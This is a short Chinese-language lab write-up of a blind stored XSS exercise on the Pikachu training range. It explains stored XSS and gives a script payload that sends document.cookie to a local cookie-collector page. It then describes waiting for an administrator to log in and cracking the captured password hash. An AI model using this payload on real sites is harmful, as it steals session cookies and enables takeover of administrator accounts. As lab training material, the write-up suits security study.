Pikachu靶场:XSS盲打

Pikachu靶场:XSS盲打

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

●xss盲打也是属于存储型XSS类型

盲打的意思是无法直接在前端看到反馈效果。

xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS

XSS盲打测试流程

1.在目标站点上找到输入点,比如查询接口,留言板等;

2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;

3.在XSS后台中查看结果

具体操作

1.在目标站点上找到输入点,比如留言板,问卷调查等

Pikachu靶场:XSS盲打_第1张图片

2.构造payload进行注入

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Pikachu靶场:XSS盲打_第2张图片

3.后台等待对方登录

Pikachu靶场:XSS盲打_第3张图片

利用hash-identifier判断加密类型

Pikachu靶场:XSS盲打_第4张图片

利用在线解密进行解密

Pikachu靶场:XSS盲打_第5张图片

总结

XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。

你可能感兴趣的:(Pikachu靶场实战,信息安全)